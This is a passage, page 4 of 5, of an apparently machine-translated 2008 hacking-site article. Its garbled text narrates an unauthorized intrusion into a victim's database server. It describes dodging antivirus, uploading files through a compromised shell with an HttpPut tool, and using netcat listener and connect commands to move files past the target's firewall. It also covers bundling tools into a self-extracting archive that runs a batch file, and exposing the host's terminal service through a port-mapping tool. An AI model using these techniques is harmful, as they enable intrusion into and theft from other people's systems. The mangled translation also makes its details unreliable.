You are here: hacking technology > hacker invade > Content
Hot Articles
Recommend Articles
New Articles
Invades in the process the simple duty(4)
  Add date: 07/10/2008   Publishing date: 07/10/2008   Hits: 74
Total 5 pages, Current page:4, Jump to page:
 

Small prompt: Gains opposite party system to kill the poisonous software has the help very much to the following invasion, because different kills the poisonous software is dissimilar to the different black soft definition condition code, i.e. certain black soft is not killed by the golden Chinese hawthorn, does not represent may hide the truth from Norton, otherwise is the same.

Has fainted, my vegetable, will only look for the auspicious star the condition code, Norton cannot look, wanted to pass on the idea which several bounce wooden horses came up to give up. Came up slides has discovered under the D plate to have many database backups, I liked, Down got down first said again. But the new question has come, Tftp and TTP cannot use, opposite party also has the hardware firewall, but Iget.vbs can only download, does not have the means upload thing, bounces the wooden horse to be possible to realize the upload but opposite party also to have kills the poisonous software ......Now my mentality starts to fall into the difficult position, I cannot be finding way out I had thought the food elder brother, he should a little good east east be possible to solve my this problem? After the general situation said to him, after he has a good laugh three, has given the small tool which I he write: HttpPut, this tool may pass to opposite party document own computer to come up, simple convenient. The application method is:

Useag: E:\HttpPut.exe [URL] [PutFilePath]

Sample: E:\HttpPut.exe

[url= http://hostname/images/] http://hostname/images/ [/url]

 c:\p.txt

Passed on several Word documents first, all normal, behind, but when I pass to the big database file the discovery is not too actually stable, Shell is very easy to hang, has attempted very many time like this (perspiration, by now inside advancement many X Cmd.exe, I have uploaded Tlist and Kill luckily, hung CMD Kill these to fall one by one).

Once again fell into the difficult position, I want to go to each big hacker website originally to look for the newest bounce wooden horse again, but the heaven opposes with me, looked could not find one satisfied quite a while. In I quickly despair time I at present suddenly one bright: NC not may break through the firewall to pass on the document? How otherwise to call the Swiss Army knife? Looked like me is rides a donkey looks for the donkey. Has the biography document method inside the NC high-level application, the concrete order is as follows:

nc - vv - l - p port > pathfile  

nc - d myip port

Will then possess the document with Winrar (5) to pack for from decompression exe, and “high-level after decompression option” - > “decompression moved” the establishment is _wpcap_.bat, the command line Winpcap peaceful packaging completes on the manufacture.

The above method is only for everybody the reference, this time I already had other simpler convenience mentality, is opens the terminal service for the database main engine, regardless of like this is passes on the thing or continues net's seepage to be able to facilitate many inward. Everybody will perhaps ask, even if you will have the jurisdiction to increase the account number to be able to open the terminal service, but how will opposite party have the firewall you to connect. Ha-ha, this question is very actually good solves, believed that everybody knew a VIDC kind of software, this kind of software's function is maps in net's port the public network the IP port to come up, like this we only needed to connect the public network IP to be possible to connect in the net to go. Uses what in here me is yyc writes the VIDC software to repair the edition correction,

 

Other pages: : <<Prev * 1 * 2 * 3 * 4 * 5 * Next>>
Prev:Invades the Linux operating system example Next:Invades once more using others' procedure

Comment:

Category: Home > hacker invade